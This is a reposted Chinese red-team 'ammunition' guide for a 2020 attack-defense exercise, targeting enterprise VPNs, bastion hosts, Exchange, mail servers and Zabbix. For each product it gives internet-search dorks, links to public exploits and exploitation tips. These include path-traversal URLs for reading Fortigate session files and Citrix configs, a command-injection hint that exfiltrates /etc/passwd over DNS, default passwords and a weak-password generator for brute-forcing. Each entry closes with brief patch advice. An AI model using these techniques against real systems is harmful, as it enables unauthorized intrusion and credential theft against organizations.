2020攻防演练弹药库-转载自斗象智能安全

原文：
https://blog.riskivy.com/2020攻防演练弹药库

深信服VPN远程代码执行

1. 漏洞简介

深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过

2. 影响组件
   深信服 VPN

3. 漏洞指纹

Set-Cookie: TWFID=

welcome to ssl vpn

Sinfor

4. Fofa Dork

header="Set-Cookie: TWFID="

5. 漏洞分析

深信服vpnweb登录逆向学习 – potatso – 博客园
https://www.cnblogs.com/potatsoSec/p/12326356.html

6. 漏洞利用

wget -t %d -T %d --spider %s

分析一下上面文章就ok, 比较简单的命令注入
7. 利用技巧

1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网

2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来

3.去除空格也简单 cat /etc/passwd | tr " \n" "+|"

8. 防护方法

1.及时更新补丁

2.升级到最新版

深信服 VPN 口令爆破

1. 漏洞简介

深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行

2. 影响组件
   深信服 VPN

3. 漏洞指纹

/por/login_auth.csp?apiversion=1

sangfor

/cgi-bin/login.cgi?rnd=

4. Fofa Dork

app="深信服-SSL-VPN"

5. 漏洞分析

关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633

此处存疑, 时间问题没有测试

6. 漏洞利用

1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多)

encoding=utf8

import requests
import hashlib
import urllib3
urllib3.disable_warnings()
import re
session = requests.session()
def SanForLogin(target, password, username="admin"):
# 加密密码的算法是 `sha1(password+sid)
# 没有公开POC就不写了

SanForLogin("https://xxxxxxxxxxx/", "admin")
7. 利用技巧

1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多

国外APT组织应该也批量爆破了一波

加密的密码也就是 sha1(password+sid)

爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些

admin/123456/Sangfor/Sangfor@123

2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能

3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧

深信服SSL VPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell – 体验盒子 – 关注网络安全
https://www.uedbox.com/post/31092/

8. 防护方法

1.及时更新补丁

2.升级到最新版

Fortigate SSL VPN 文件读取/远程代码执行

1. 漏洞简介

Fortigate SSL VPN 在全球用户量巨大, 去年橘子哥发现了文件读取和远程代码执行漏洞

2. 影响组件
   Fortigate SSL VPN

3. 漏洞指纹

Fortigate

4tinet2095866

4. Fofa Dork

"Fortigate" && port=10443

5. 漏洞分析

Orange: Attacking SSL VPN – Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html?m=1

6. 漏洞利用

密码读取

milo2012/CVE-2018-13379: CVE-2018-13379
https://github.com/milo2012/CVE-2018-13379

任意密码重置, 这肯定是个后门

milo2012/CVE-2018-13382: CVE-2018-13382
https://github.com/milo2012/CVE-2018-13382

7. 利用技巧

1.文件读取的路径构造

https://xxxxxx:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

如下padding可以构造出来任意文件读取, 可以读取其他文件, 注意这个系统好像没有/etc/passwd

print("/../../../../"+(raw_input().rjust(35, '/')))

2.寻找魔术数字

虽然当时橘子哥没有公开魔术数字, 但是当时随手分析了一下下面这个启动文件, 搜索一下magic就找到 4tinet2095866,

https://xxxxxxxx:10443/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd

后来发现这个字符串在js里面也有, 直接从前台分析也可以获得

https://xxxxx:10443/sslvpn/js/login.js?q=5f9a6877fd1f78da768239aae6e739c2

8. 防护方法

1.及时更新补丁

2.升级到最新版

Pulse Secure SSL VPN远程代码执行漏洞

1. 漏洞简介

Pulse Secure SSL VPN 在全球用户量巨大, 去年橘子哥发现了很多漏洞

2. 影响组件

Pulse Secure SSL VPN

3. 漏洞指纹

Pulse Secure SSL VPN

4. Fofa Dork

app="PulseSecure-SSL-VPN"

5. 漏洞分析

Pulse Secure SSL VPN远程代码执行漏洞利用与分析 – 安全客, 安全资讯平台
https://www.anquanke.com/post/id/185773

6. 漏洞利用

projectzeroindia/CVE-2019-11510: Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
https://github.com/projectzeroindia/CVE-2019-11510

0xDezzy/CVE-2019-11539: Exploit for the Post-Auth RCE vulnerability in Pulse Secure Connect
https://github.com/0xDezzy/CVE-2019-11539

7. 利用技巧

8. 防护方法

1.及时更新补丁

2.升级到最新版

Palo Alto GlobalProtect VPN远程代码执行漏洞

1. 漏洞简介

Palo Alto GlobalProtect 在全球用户量巨大, 去年橘子哥发现了很多漏洞

2. 影响组件
   Palo Alto GlobalProtect

3. 漏洞指纹

GlobalProtect Portal

4. Fofa Dork

app="PaloAlto-GlobalProtect"

5. 漏洞分析

Orange: Attacking SSL VPN – Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!
https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html

Palo Alto GlobalProtect上的PreAuth RCE – 渗透测试中心 – 博客园
https://www.cnblogs.com/backlion/p/11209054.html

6. 漏洞利用

securifera/CVE-2019-1579
https://github.com/securifera/CVE-2019-1579

7. 利用技巧

1.这个扫描的话可以判断

/global-protect/portal/css/login.css
/images/logo_pan_158.gif

Last-Modified 是否早于于2018年

curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified

Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT

8. 防护方法

1.及时更新补丁

2.升级到最新版

Citrix Gateway/ADC 远程代码执行漏洞 (CVE-2019-19781)

1. 漏洞简介

Citrix Gateway/ADC 在全球拥有很多的大客户. 这也是个很经典的灯下黑漏洞(后门)

2. 影响组件

Citrix Gateway/ADC

3. 漏洞指纹

Citrix Gateway/ADC

4. Fofa Dork

app="Citrix-Netscaler"

5. 漏洞分析

Citrix Gateway/ADC 远程代码执行漏洞分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/news/232752.html

6. 漏洞利用

trustedsec/cve-2019-19781: This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
https://github.com/trustedsec/cve-2019-19781

7. 利用技巧

1.通过以下命令可以快速断定

curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure

这里部分版本不需要进行../跳转也可以, 具体原因没有分析

8. 防护方法

1.及时更新补丁

2.升级到最新版

3.暂时屏蔽未授权用户对/vpns/路径的访问

齐治堡垒机相关漏洞

1. 漏洞简介

齐治堡垒机是国内使用比较多的堡垒机产品, 后端使用PHP编写

2. 影响组件
   齐治堡垒机

3. 漏洞指纹

shterm

4. Fofa Dork

app="shterm-堡垒机"

5. 漏洞分析

审计某系统从解密到GetShell – 云+社区 – 腾讯云
https://cloud.tencent.com/developer/article/1448700

齐治堡垒机远程命令执行漏洞（CNVD-2019-20835）分析 – 开发笔记
http://kfbiji.com/article/65b98114903248eb

6. 漏洞利用

齐治堡垒机远程命令执行漏洞（CNVD-2019-20835）分析 – 开发笔记
http://kfbiji.com/article/65b98114903248eb

7. 利用技巧

1.齐治堡垒机默认口令:shterm/shterm

2.普通用户获取堡垒机权限, 登录之后可尝试命令注入

如果有类似chrome的应用可以直接使用ctrl+o打开窗口, 然后新建bat, 起一个cmd或者其他的程序

8. 防护方法

1.及时更新补丁

2.升级到最新版

3.做好权限控制

Exchange 相关漏洞

1. 漏洞简介

Exchange 是企业用量很大的邮件服务器, 包括一个登录后用户伪造(CVE-2018-8581, 利用难度高)和登录后反序列化漏洞(CVE-2020-0688, 利用难度低)

2. 影响组件
   Exchange

3. 漏洞指纹

Exchange

outlook

4. Fofa Dork

app="Microsoft-Exchange"

5. 漏洞分析

微软Exchange爆出0day漏洞, 来看POC和技术细节 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/195162.html

Microsoft Exchange 任意用户伪造漏洞（CVE-2018-8581）分析
https://paper.seebug.org/804/

微软Exchange服务器远程代码执行漏洞复现分析[CVE-2020-0688] – 先知社区
https://xz.aliyun.com/t/7299

6. 漏洞利用

Ridter/Exchange2domain: CVE-2018-8581
https://github.com/Ridter/Exchange2domain

Ridter/cve-2020-0688: cve-2020-0688
https://github.com/Ridter/cve-2020-0688

pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
https://github.com/pwntester/ysoserial.net

7. 利用技巧

1.寻找企业的Exchange有个技巧

除了访问以下域名或者直接查找 DNS MX 记录

mail.domain.com
mail1.domain.com
mail-hk.domain.com
owa.domain.com
exchange.domain.com
email.domain.com
outlook.domain.com
还有个很好用的域名, 这是outlook的自动发现域名

autodiscover.domain.com

2.爆破Exchange

这里两个漏洞都需要登录, 其实这个的弱口令不是很难找, 经常会成为企业的突破口

通常这里的密码能横穿内网, 比如 VPN, OA, SSO

Exchange通常有以下几个接口

/owa 前台web登录, 一般可以爆破

/ews 这里是ews的接口, 可以进行401认证爆破, 只需要(域)账号和密码, 不需要知道域名前缀, 更方便爆破

/autodiscover/autodiscover.xml 自动发现接口, 同ews爆破

3.爆破工具可使用 owa用burp, ews用ruler, awvs(比较好用)

sensepost/ruler: A tool to abuse Exchange services
https://github.com/sensepost/ruler

4.弱口令爆破技巧, 爆破Exchange相对比较好用, 直接生成企业特色弱口令

import itertools
prefix = ['baidu', 'Baidu']
for x in [''.join(x) for x in list(itertools.product(prefix, ['@', ''], ['2019', '2020', '2018', '123', '1234', '123456'], ['!', '', '.']))] : print(x)

baidu@2019!
baidu@2019
baidu@2019.
baidu@2020!
baidu@2020
.........
Baidu123456
Baidu123456.
8. 防护方法

1.及时更新补丁

2.升级到最新版

3.做好权限控制

Coremail 相关漏洞

1. 漏洞简介

Coremail 是国内使用量很大的邮件服务商, 包括网易邮箱的后端使用的也是coremail

2. 影响组件
   Coremail

3. 漏洞指纹

Coremail

4. Fofa Dork

app="Coremail"

5. 漏洞分析
   Coremail-0day敏感文件泄露漏洞送附批量检测脚本_数据库_god_Zeo的博客-CSDN博客
   https://blog.csdn.net/god_zzZ/article/details/92735189

6. 漏洞利用

yuxiaoyou123/coremail-exp
https://github.com/yuxiaoyou123/coremail-exp

dpu/coremail-address-book: Coremail邮件系统组织通讯录导出脚本
https://github.com/dpu/coremail-address-book

7. 利用技巧

1.这个找不到源码, 没法分析

里面的密码也多半没啥用, 还不如邮件里搜索一下vpn/密码

2.这个东西有几率受到ImageMagick影响(此处存疑, 我只在dnslog见过, 没有实锤)

8. 防护方法

1.及时更新补丁

2.升级到最新版

Winmail 相关漏洞

1. 漏洞简介

Winmail 是国内使用量较大的邮件服务商, 由于版本老旧, 有一些历史漏洞, 注入, 任意文件下载, 上传

2. 影响组件
   Winmail

3. 漏洞指纹

Winmail

4. Fofa Dork

app="Winmail-Server"

5. 漏洞分析

Winmail最新直达webshell 0day漏洞挖掘实录_91Ri.org
http://www.91ri.org/16519.html

winmail过滤不严getshell+任意文件下载(需要登录邮箱）_黑客技术
http://www.hackdig.com/06/hack-36899.htm

Winmail普通用户可直接进入后台取得域名管理、用户管理等所有权限 | WooYun-2014-57890 | WooYun.org
https://php.mengsec.com/bugs/wooyun-2014-057890.html

6. 漏洞利用

Winmail最新直达webshell 0day漏洞挖掘实录_91Ri.org
http://www.91ri.org/16519.html

winmail过滤不严getshell+任意文件下载(需要登录邮箱）_黑客技术
http://www.hackdig.com/06/hack-36899.htm

Winmail普通用户可直接进入后台取得域名管理、用户管理等所有权限 | WooYun-2014-57890 | WooYun.org
https://php.mengsec.com/bugs/wooyun-2014-057890.html

7. 利用技巧

1.这个邮箱很多高校在用, 通过分析补丁, 一些老版本没升级的话还是有问题, 最新版是6.5

2.邮件系列老洞

高屋建瓴之WebMail攻与防 – cyjay5un – 博客园
https://www.cnblogs.com/cyjaysun/p/4378907.html

8. 防护方法

1.及时更新补丁

2.升级到最新版

Zabbix 相关漏洞

1. 漏洞简介

Zabbix 由于监控着内网众多主机, 所以也是内网关注的重点, 主要是注入/弱口令/命令执行

2. 影响组件

Zabbix

3. 漏洞指纹

Zabbix

4. Fofa Dork

app="Zabbix"

5. 漏洞分析

记一次zabbix安装及漏洞利用getshell全过程 – 先知社区
https://xz.aliyun.com/t/6874

Zabbix 最新 SQL 注入漏洞及 EXP – Jamin Zhang
https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP/

6. 漏洞利用

记一次zabbix安装及漏洞利用getshell全过程 – 先知社区
https://xz.aliyun.com/t/6874

Zabbix 最新 SQL 注入漏洞及 EXP – Jamin Zhang
https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP/

7. 利用技巧

1.这里如果 Zabbix 附近遇到 Grafana, 一般都是默认口令 admin/admin, 进后台查看数据源的位置, 如果有 Zabbix , 直接 f12 查看密码, 就可以登录 Zabbix 了

2.另外 Grafana 后台sql查询处可以执行任意 sql, 其他数据源也一样见机行事

8. 防护方法

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞

1. 漏洞简介

大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主

2. 影响组件

防火墙, 网关, 路由器, VPN

3. 漏洞指纹

防火墙, 网关, 路由器, VPN

4. Fofa Dork
   防火墙, 网关, 路由器, VPN 的名称

5. 漏洞分析

【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html

渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA

6. 漏洞利用

【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html

渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA

7. 利用技巧

1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令

admin root 123456 永远的神

内网的安全平台就是个漏洞指南

8. 防护方法

1.设置强口令

2.限制来源IP